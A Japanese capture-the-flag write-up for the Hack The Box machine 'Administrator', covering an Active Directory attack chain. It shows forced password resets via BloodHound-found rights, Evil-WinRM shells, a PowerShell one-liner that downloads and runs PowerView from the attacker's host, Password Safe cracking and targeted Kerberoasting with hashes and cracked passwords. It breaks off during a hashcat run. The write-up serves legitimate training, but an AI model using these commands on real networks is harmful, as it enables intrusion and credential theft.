Hack The BoxのWriteup(Administrator)[Medium]

※本サイトはアフィリエイト広告を利用しています。
広告

本記事の概要

Hack The BoxのWindowsサーバの難易度Mediumのマシンである「Administrator」に対する攻撃手法を記載します。

本記事では、以下の手順を記載します。
  (1) ポートスキャン
  (2) 名前解決のためのhostsファイル更新
  (3) SMBアクセスによるファイル取得
  (4) BloodHoundを用いたActive Directoryの環境を解析(1回目)
  (5) Evil-WinRMを用いたOliviaユーザー権限奪取
  (6) BloodHoundを用いたActive Directoryの環境を解析(2回目)
  (7) Evil-WinRMを用いたmichaelユーザー権限奪取
  (8) BENJAMINユーザーのパスワード変更
  (9) FTPを用いてBENJAMINユーザーでログイン
  (10) hashcatを用いてハッシュ値解析(Safe V3 databaseの解析)
  (11) Safe V3 databaseの内容確認
  (12) Evil-WinRMを用いたemilyユーザー権限奪取
  (13) BloodHoundを用いたActive Directoryの環境を解析(3回目)
  (14) ethanユーザーのパスワード変更
  (15) hashcatを用いてハッシュ値解析(Kerberos 5 TGS-REPから解析)
  (16) BloodHoundを用いたActive Directoryの環境を解析(4回目)
  (17) 特権昇格(Windowsパスワードハッシュ値を用いたEvil-WinRMのログイン)


※画面や記載している手順は記事を作成した時点のものですので、画面などが変わっている可能性があります。


ポートスキャン


(1) nmapコマンドを実行して、応答があるポート番号を確認する。FTP(21/tcp) やSMB(445/tcp)などポートが応答がある。また、ドメイン名が「administrator.htb」でホスト名が「DC」であることが分かる。

$ nmap -sS -sC -sV -A -p- -Pn --min-rate 5000 10.10.11.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-14 08:23 EST
Warning: 10.10.11.42 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.42
Host is up (0.18s latency).
Not shown: 65116 closed tcp ports (reset), 393 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-11-14 20:23:53Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
62876/tcp open  msrpc         Microsoft Windows RPC
65269/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
65280/tcp open  msrpc         Microsoft Windows RPC
65285/tcp open  msrpc         Microsoft Windows RPC
65288/tcp open  msrpc         Microsoft Windows RPC
65311/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=11/14%OT=21%CT=1%CU=33472%PV=Y%DS=2%DC=T%G=Y%TM=69172D
OS:C0%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=I%CI=I%II=I%SS=S%TS
OS:=A)SEQ(SP=102%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=104%GCD=1%IS
OS:R=10B%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=106%GCD=1%ISR=10A%TI=I%CI=I%II=I%S
OS:S=S%TS=A)OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST1
OS:1%O5=M552NW8ST11%O6=M552ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF
OS:%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%
OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R
OS:=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-11-14T20:25:07
|_  start_date: N/A
|_clock-skew: 6h59m58s

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   201.15 ms 10.10.14.1
2   201.27 ms 10.10.11.42

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.96 seconds


名前解決のためのhostsファイル更新


(1) 名前解決できるようにKali Linuxの/etc/hostsファイルに記載する。

$ echo '10.10.11.42 administrator.htb' | sudo tee -a /etc/hosts
$ echo '10.10.11.42 dc.administrator.htb' | sudo tee -a /etc/hosts

$ cat /etc/hosts
   →「10.10.11.42 administrator.htb」や「10.10.11.42 dc.administrator.htb」が出力されることを確認する。


SMBアクセスによるファイル取得


(1) CrackMapExecの–sharesオプションを付けて、SMBの共有フォルダ一覧の表示を試みる。しかし、ユーザーを何も指定していないと拒否されてしまう。

※Kali Linux上で以下のコマンドを実行する。

# crackmapexec smb administrator.htb --shares
SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         administrator.htb 445    DC               [-] Error enumerating shares: STATUS_USER_SESSION_DELETED


(2) CrackMapExecを用いてOliviaユーザーで共有フォルダ一覧を確認するが、特に気になるフォルダはない。

※Kali Linux上で以下のコマンドを実行する。

# crackmapexec smb administrator.htb -u 'Olivia' -p 'ichliebedich' --shares
SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         administrator.htb 445    DC               [+] administrator.htb\Olivia:ichliebedich
SMB         administrator.htb 445    DC               [+] Enumerated shares
SMB         administrator.htb 445    DC               Share           Permissions     Remark
SMB         administrator.htb 445    DC               -----           -----------     ------
SMB         administrator.htb 445    DC               ADMIN$                          Remote Admin
SMB         administrator.htb 445    DC               C$                              Default share
SMB         administrator.htb 445    DC               IPC$            READ            Remote IPC
SMB         administrator.htb 445    DC               NETLOGON        READ            Logon server share
SMB         administrator.htb 445    DC               SYSVOL          READ            Logon server share


BloodHoundを用いたActive Directoryの環境を解析(1回目)


(1) BloodHoundを使用してActive Directoryの情報を閲覧できるように、Kali Linux上で環境準備をします。

※Kali Linux上で以下のコマンドを実行する。 

$ sudo apt install -y neo4j
$ sudo neo4j start
$ sudo neo4j console


(2) ブラウザを起動して、「http://localhost:7474/」にアクセスする。


(3) Bloodhoundを用いてActive Directory環境を列挙する。

※Kali Linux上で以下のコマンドを実行する。 

# bloodhound-python -d administrator.htb -u 'Olivia' -p 'ichliebedich' -dc 'dc.administrator.htb' -c all -ns 10.10.11.42
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 56S


(4) 取得したActive Directory環境のファイル一覧が格納されていることを確認する。

※Kali Linux上で以下のコマンドを実行する。 

$ ls -l
total 156
-rw-r--r-- 1 root root  3994 Nov 14 19:43 20251114194213_computers.json
-rw-r--r-- 1 root root 25178 Nov 14 19:42 20251114194213_containers.json
-rw-r--r-- 1 root root  3580 Nov 14 19:42 20251114194213_domains.json
-rw-r--r-- 1 root root  3994 Nov 14 19:42 20251114194213_gpos.json
-rw-r--r-- 1 root root 82686 Nov 14 19:42 20251114194213_groups.json
-rw-r--r-- 1 root root  1931 Nov 14 19:42 20251114194213_ous.json
-rw-r--r-- 1 root root 26015 Nov 14 19:42 20251114194213_users.json


(5) BloodHoundを起動する。

※Kali Linux上で以下のコマンドを実行する。

$ wget https://github.com/SpecterOps/BloodHound-Legacy/releases/download/v4.3.1/BloodHound-linux-x64.zip

$ unzip BloodHound-linux-x64.zip

$ sudo ./BloodHound-linux-x64/BloodHound --no-sandbox


(6) BloodHoundのログイン画面が表示されることを確認するため、「ユーザー名:neo4j」とパスワードを入力する。その後、「Login」をクリックする。


(7) ログインに成功し、BloodHoundの画面が表示される。


(8) ドラッグ&ドロップでADの環境ファイル(20251114194213_computers.json等)をBloodHoundに読み込ませる。


(9) 左上部の「Olivia」を入力して、「OLIVIA@ADMINISTRATOR.HTB」をクリックする。


(10) 「OLIVIA@ADMINISTRATOR.HTB」のオブジェクトをクリックする。


(11) [Node Info] > [OUTBOUND OBJECT CONTROL] > [First Degree Object Control] をクリックすると、OLIVIAユーザーはMICHAELユーザーに対してGenericAll権限があることが分かる。


(12) GenericAllの線を右クリックで選択し、「Help」をクリックする。


(13) 「Windows Abuse」タブをクリックすると、GenericAll権限の中にForce Change Password権限があるため、MICHAELユーザーはMICHAELユーザーのパスワードを変更できる権限があることが分かる。


Evil-WinRMを用いたOliviaユーザー権限奪取


(1) Oliviaユーザーの認証情報を用いてEvil-WinRMを実行すると、Oliviaユーザーのプロンプトが表示される。
 ※Evil-WinRMとは、Windows Remote Managementのサービスをリモートから実行し、任意コマンドが実行できるプログラム

※Kali Linux上で以下のコマンドを実行する。

$ evil-winrm -u Olivia -p 'ichliebedich' -i administrator.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents>


(2) 現在ログインしているユーザー情報を確認すると、administrator\oliviaユーザーであることが分かる。

※Oliviaユーザーでログインしている攻撃対象のマシン(Administrator)のコマンドを実行する。

*Evil-WinRM* PS C:\Users\olivia\Documents> whoami
administrator\olivia


(3) michaelユーザーのパスワードを「nirza123」に変更する。

※Oliviaユーザーでログインしている攻撃対象のマシン(Administrator)のコマンドを実行する。

*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael nirza123 /domain
The command completed successfully.


BloodHoundを用いたActive Directoryの環境を解析(2回目)


(1) 左上部の「MICHAEL」を入力して、「MICHAEL@ADMINISTRATOR.HTB」のオブジェクトを表示する。


(2) [Node Info] > [OUTBOUND OBJECT CONTROL] > [Transitive Object Control] をクリックする。


(3) MICHAELユーザーはBENJAMINユーザーにForceChangePassword権限を持っているため、パスワードを変更できることが分かる。


(4) ForceChangePasswordの線を右クリックで選択し、「Help」をクリックする。


(5) 「Windows Abuse」タブをクリックすると、パスワード変更する際のコマンドが記載されている。


(6) 左上部の「BENJAMIN」を入力して、「BENJAMIN@ADMINISTRATOR.HTB」のオブジェクトを表示する。


(7) [Node Info] > [GROUP MEMBERSHIP] > [First Degree Group Memberships] をクリックする。BENJAMINユーザーは「Share Moderators」グループに所属していることが分かる。また、nmapの結果21/tcpが開いていることが分かっているため、BENJAMINユーザーの認証情報を用いてFTPのログインができることが分かる。


Evil-WinRMを用いたmichaelユーザー権限奪取


(1) michaelユーザーの認証情報を用いてEvil-WinRMを実行すると、michaelユーザーのプロンプトが表示される。

※Kali Linux上で以下のコマンドを実行する。

$ evil-winrm -u michael -p 'nirza123' -i administrator.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents>


(2) 現在ログインしているユーザー情報を確認すると、administrator\michaelユーザーであることが分かる。

※michaelユーザーでログインしている攻撃対象のマシン(Administrator)のコマンドを実行する。

*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael


BENJAMINユーザーのパスワード変更


(1) Kali Linux上でHTTP(8081/tcp)サービスを起動する。

※Kali Linux上で以下のコマンドを実行する。

$ cd /usr/share/windows-resources/powersploit/Recon/


$ ip a
  →VPV用のインターフェースのIPアドレスが「10.10.14.8」


$ python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...


(2) Kali Linux上にあるPowerView.ps1を攻撃対象のマシン(Administrator)にダウンロードする。

※michaelユーザーでログインしている攻撃対象のマシン(Administrator)のコマンドを実行する。

*Evil-WinRM* PS C:\Users\michael\Documents> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.8:8081/PowerView.ps1')


(3) BENJAMINユーザーのパスワードを「Password123!」に変更する。

※michaelユーザーでログインしている攻撃対象のマシン(Administrator)のコマンドを実行する。

*Evil-WinRM* PS C:\Users\michael\Documents> $SecPassword = ConvertTo-SecureString 'nirza123' -AsPlainText -Force


*Evil-WinRM* PS C:\Users\michael\Documents> $Cred = New-Object System.Management.Automation.PSCredential('ADMINISTRATOR\michael', $SecPassword)


*Evil-WinRM* PS C:\Users\michael\Documents> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force


*Evil-WinRM* PS C:\Users\michael\Documents> Set-DomainUserPassword -Identity BENJAMIN -AccountPassword $UserPassword -Credential $Cred


FTPを用いてBENJAMINユーザーでログイン


(1) benjaminユーザーの認証情報を用いてFTPでログインする。

※Kali Linux上で以下のコマンドを実行する。

$ ftp benjamin@administrator.htb
  →パスワード(Password123!)を入力する。
Connected to administrator.htb.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>


(2) dirコマンドでディレクトリ/ファイル一覧を表示すると、Backup.psafe3というファイルがあることが分かる。

※benjaminユーザーでログインしている攻撃対象のマシン(Administrator)のコマンドを実行する。

ftp> dir
229 Entering Extended Passive Mode (|||62904|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.


(3) getコマンドでBackup.psafe3をダウンロードする。

※benjaminユーザーでログインしている攻撃対象のマシン(Administrator)のコマンドを実行する。

ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||62907|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************************************|   952        4.36 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (4.35 KiB/s)


(4) exitコマンドでFTP接続を終了する。

※benjaminユーザーでログインしている攻撃対象のマシン(Administrator)のコマンドを実行する。

ftp> exit


hashcatを用いてハッシュ値解析(Safe V3 databaseの解析)


(1) Backup.psafe3のファイルタイプを確認すると、Password Safeというパスワード管理アプリケーションのデータベースファイルであることが分かる。

※Kali Linux上で以下のコマンドを実行する。

$ file Backup.psafe3
Backup.psafe3: Password Safe V3 database


(2) 「https://hashcat.net/wiki/doku.php?id=example_hashes」でHash Modeの値を確認すると、「Password Safe v3」のHash Modeは5200であることが分かる。


(3) hashcatを用いてハッシュ値を解析すると、Backup.psafe3のパスワードが「tekieromucho」であることが分かる。

※Kali Linux上で以下のコマンドを実行する。

$ hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
ーーー(省略)ーーー
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Backup.psafe3:tekieromucho
ーーー(省略)ーーー



Safe V3 databaseの内容確認


(1) Backup.psafe3を開くために、passwordsafeをインストールする。

※Kali Linux上で以下のコマンドを実行する。

$ sudo apt install passwordsafe -y


(2) Backup.psafe3を開く。

※Kali Linux上で以下のコマンドを実行する。

$ pwsafe Backup.psafe3


(3) Password Safeの画面が表示されるため、パスワード(tekieromucho)を入力して「OK」をクリックする。


(4) Backup.psafe3に格納されているユーザー一覧を確認することができる。


(5) Backup.psafe3に格納されているユーザー一覧をファイルの保存する。

※Kali Linux上で以下のコマンドを実行する。

$ vi user.txt

【user.txtの内容】
alexander
emily
emma


(6) 各ユーザーを右クリックで選択し、「Copy Password to Clipboard」をクリックすることでパスワードをコピーする。


(7) Backup.psafe3に格納されているパスワード一覧をファイルの保存する。

※Kali Linux上で以下のコマンドを実行する。

$ vi password.txt

【password.txtの内容】
UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
UXLCI5iETUsIBoFVTj8yQFKoHjXmb
WwANQWnmJnGV07WQN8bMS7FMAbjNur


(8) netexecを用いてSMBでログインできるユーザー名とパスワードの組み合わせを検索すると、emilyユーザーのパスワードが「UXLCI5iETUsIBoFVTj8yQFKoHjXmb」であることが分かる。

※Kali Linux上で以下のコマンドを実行する。

$ netexec smb administrator.htb -u user.txt -p password.txt
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [-] administrator.htb\emily:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [-] administrator.htb\emma:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [-] administrator.htb\alexander:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb


Evil-WinRMを用いたemilyユーザー権限奪取


(1) emilyユーザーの認証情報を用いてEvil-WinRMを実行すると、emilyユーザーのプロンプトが表示される。

※Kali Linux上で以下のコマンドを実行する。

$ evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents>


(2) 現在ログインしているユーザー情報を確認すると、administrator\emilyユーザーであることが分かる。

※emilyユーザーでログインしている攻撃対象のマシン(Administrator)上で以下のコマンドを実行する。

*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily


(3) 一般ユーザー用のフラグファイルの内容を確認する。

※emilyユーザーでログインしている攻撃対象のマシン(Administrator)上で以下のコマンドを実行する。

*Evil-WinRM* PS C:\Users\emily\Documents> type C:\Users\emily\Desktop\user.txt
88867486aedea7b4ee438dd64329063d


BloodHoundを用いたActive Directoryの環境を解析(3回目)


(1) 左上部の「EMILY」を入力して、「EMILY@ADMINISTRATOR.HTB」のオブジェクトを表示する。


(2) [Node Info] > [OUTBOUND OBJECT CONTROL] > [Transitive Object Control] をクリックすると、emilyユーザーはethanユーザーへGenericWrite権限があることが分かる。


(3) GenericWriteの線を右クリックで選択し、「Help」をクリックする。


(4) 「Linux Abuse」タブをクリックすると、パスワード変更する際のコマンドが記載されている。


ethanユーザーのパスワード変更


(1) 「https://github.com/ShutdownRepo/targetedKerberoast」のファイルをダウンロードする。

※Kali Linux上で以下のコマンドを実行する。

$ git clone https://github.com/ShutdownRepo/targetedKerberoast


$ cd targetedKerberoast


(2) targetedKerberoast.pyを用いてユーザーアカウントの「kerberoast」ハッシュ値を取得しようとする。しかし、攻撃対象のマシン(Administrator)と時刻が違うため、「Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)」というエラーメッセージが表示される。

※Kali Linux上で以下のコマンドを実行する。

$ python3 targetedKerberoast.py --dc-ip 10.10.11.42 -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -U ethan.txt
[*] Starting kerberoast attacks
[*] Fetching usernames from file
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)


(3) 攻撃対象のマシン(Administrator)と時刻を合わせる。

※Kali Linux上で以下のコマンドを実行する。

# ntpdate 10.10.11.42


(4) targetedKerberoast.pyを用いてユーザーアカウントの「kerberoast」ハッシュ値を取得する。

※Kali Linux上で以下のコマンドを実行する。

$ python3 targetedKerberoast.py --dc-ip 10.10.11.42 -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'             
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$6a8cb0e572b64906d735ed344164fc3b$1546362c878c649ca7a612711b26a0193122cf3cddb39f94224b0784f45604aee2c3ad60aba7cbcf551ee2aead38226117b11fe8e71f8e9ddec43844068a65669297d1a45bf5879fb9b33564ce0e0fde8a61100d52bd6f1b9af0dfea8237f35e8970d64d4ed5fd479317ede606afc2be0ec7b10a58961e6fce6b7a9a6b95685888fd0b1a7bc11b9416723b7aab44ee8b4dbdf93c9f67cd0f91a8c5a599ee19c42a6d81df59549700a3916730be8503da0804a9502bab3db9ee25e7b01c0abbb9ecd102dc5ea3fb5c905646eeb504af01cda02ceaed9658cb1db56937a2f81972de4baddaf60293b5cd744107f3a908a198ba4dd1752f02177b6ce9fcb1ce23768f0d86a48f3c8961df8f212c9aa37c65720153bcb8eef8d3f96233a2991b066b0e05cbcbe365c2d536e886085d94079d514fcb66a9b24a90234bfd23e076fa9ce0436368e601b3dafd7d75c7bcfd66851694664da84c7cc71739169e7a64fb97778d9557b7799f3d0268ab76b791e31b5599c11f5fb3ee6145ac7c61163c52068432b74bf8da63145e97eff05c938c46267751bfb0302d3d7b1f6bfb41dbf0478cd37027fb394c07326e0316ab1ac3a8316ec0dade7d6b05827d74f2c3e476b3f2ffcf45ed596bfe336d9779a8b23306fa3a33853105da5ec2d7a25b09ce2c177d0d9f3158fac591b0cd1e77d2edb8261cb63674c324e9a901f1a89e77366aaff13ac4f9a11cebb66b1150f0439fd642bb15ffb29fb6f9302582c15c541af4d3caf5971f4d4d5995a7a29091f07ad067649e6bbd77245d35e45d19730fde567177b61036a0ba55dc6233da093419bd84f9eb342913b16583bc046b12cf7ec1d89030a9d1fc1baa96e97d4038eb49a68f34aca29ef81a0f504e4ea66f0b078dca1f03e2a04b21d46371f018b97488e90d2a7a53ed45385cca73fb5200c88bbc055f10a31e29e2301d71040fcf88a852401db748100512cbed9c135aa02ad4c41d4b5df5b7273aea7ce5224e11c2117ff5385f338710d58fc8aa6d4fa918c8b01292cdeef16ddf0d4a16cf0d266e817fdb11fec0be37de41d201323bfaa80fcb51ddd47cf9b3204f7e06a1fcbd1b0ff3f1b29bcc3e2d095885ff9c09665b515fea8f95d09191a3dfeadf9ede6eb9b61e4c9c551bdd0e8afa6758bc4d5acb70b13bec74c5327ff500781554c303531ac79c7f3c0ea6d4cabb488732c8f72093eca156e298fc57d2f8d7a1a0e43c3033b4cdd6906f467783a630589bc9144449fbfd33dbfc5cd3f9c94200598e0b19d1282c9e33d395296cd2dfc6fe58235205c740d5b6c3d48bf6c020f05cd2faa5e7b7b00f20d6fbf774cb2c33f61e8ad7290d370b3aa8ce400284814d25369c7d588ac7f017541513148a6b8336c37a9c1411fc99e2e494d8d4abd749ed3b9234f7d4a440a74de75791526d9a29c02aa6e5a1fd0f85c432081670c46d52b40758179b279bc1989012fb15d93284f36d32a2b932a8f75687ff182eaeacd440603bc75b284dcc1652762320baee907c7d72e38c


(5) 取得したハッシュ値をファイルに保存する。

※Kali Linux上で以下のコマンドを実行する。

$ vi ethan.txt

【ethan.txtの内容】
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$6a8cb0e572b64906d735ed344164fc3b$1546362c878c649ca7a612711b26a0193122cf3cddb39f94224b0784f45604aee2c3ad60aba7cbcf551ee2aead38226117b11fe8e71f8e9ddec43844068a65669297d1a45bf5879fb9b33564ce0e0fde8a61100d52bd6f1b9af0dfea8237f35e8970d64d4ed5fd479317ede606afc2be0ec7b10a58961e6fce6b7a9a6b95685888fd0b1a7bc11b9416723b7aab44ee8b4dbdf93c9f67cd0f91a8c5a599ee19c42a6d81df59549700a3916730be8503da0804a9502bab3db9ee25e7b01c0abbb9ecd102dc5ea3fb5c905646eeb504af01cda02ceaed9658cb1db56937a2f81972de4baddaf60293b5cd744107f3a908a198ba4dd1752f02177b6ce9fcb1ce23768f0d86a48f3c8961df8f212c9aa37c65720153bcb8eef8d3f96233a2991b066b0e05cbcbe365c2d536e886085d94079d514fcb66a9b24a90234bfd23e076fa9ce0436368e601b3dafd7d75c7bcfd66851694664da84c7cc71739169e7a64fb97778d9557b7799f3d0268ab76b791e31b5599c11f5fb3ee6145ac7c61163c52068432b74bf8da63145e97eff05c938c46267751bfb0302d3d7b1f6bfb41dbf0478cd37027fb394c07326e0316ab1ac3a8316ec0dade7d6b05827d74f2c3e476b3f2ffcf45ed596bfe336d9779a8b23306fa3a33853105da5ec2d7a25b09ce2c177d0d9f3158fac591b0cd1e77d2edb8261cb63674c324e9a901f1a89e77366aaff13ac4f9a11cebb66b1150f0439fd642bb15ffb29fb6f9302582c15c541af4d3caf5971f4d4d5995a7a29091f07ad067649e6bbd77245d35e45d19730fde567177b61036a0ba55dc6233da093419bd84f9eb342913b16583bc046b12cf7ec1d89030a9d1fc1baa96e97d4038eb49a68f34aca29ef81a0f504e4ea66f0b078dca1f03e2a04b21d46371f018b97488e90d2a7a53ed45385cca73fb5200c88bbc055f10a31e29e2301d71040fcf88a852401db748100512cbed9c135aa02ad4c41d4b5df5b7273aea7ce5224e11c2117ff5385f338710d58fc8aa6d4fa918c8b01292cdeef16ddf0d4a16cf0d266e817fdb11fec0be37de41d201323bfaa80fcb51ddd47cf9b3204f7e06a1fcbd1b0ff3f1b29bcc3e2d095885ff9c09665b515fea8f95d09191a3dfeadf9ede6eb9b61e4c9c551bdd0e8afa6758bc4d5acb70b13bec74c5327ff500781554c303531ac79c7f3c0ea6d4cabb488732c8f72093eca156e298fc57d2f8d7a1a0e43c3033b4cdd6906f467783a630589bc9144449fbfd33dbfc5cd3f9c94200598e0b19d1282c9e33d395296cd2dfc6fe58235205c740d5b6c3d48bf6c020f05cd2faa5e7b7b00f20d6fbf774cb2c33f61e8ad7290d370b3aa8ce400284814d25369c7d588ac7f017541513148a6b8336c37a9c1411fc99e2e494d8d4abd749ed3b9234f7d4a440a74de75791526d9a29c02aa6e5a1fd0f85c432081670c46d52b40758179b279bc1989012fb15d93284f36d32a2b932a8f75687ff182eaeacd440603bc75b284dcc1652762320baee907c7d72e38c


hashcatを用いてハッシュ値解析(Kerberos 5 TGS-REPから解析)


(1) ブラウザを用いて「https://hashes.com/en/tools/hash_identifier」にアクセスする。その後、取得したハッシュ値を入力して、「SUBMIT & IDENTIFY」をクリックする。


(2) ハッシュ値が「Kerberos 5 TGS-REP etype 23」の文字列であることが分かる。


(3) 「https://hashcat.net/wiki/doku.php?id=example_hashes」でHash Modeの値を確認すると、「Kerberos 5, etype 23, TGS-REP」のHash Modeは13100であることが分かる。

(4) hashcatを用いてハッシュ値を解析すると、「limpbizkit」であることが分かる。

※Kali Linux上で以下のコマンドを実行する。

$ hashcat -a 0 -m 13100 ethan.txt /usr/share/wordlists/rockyou.txt
ーーー(省略)ーーー
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

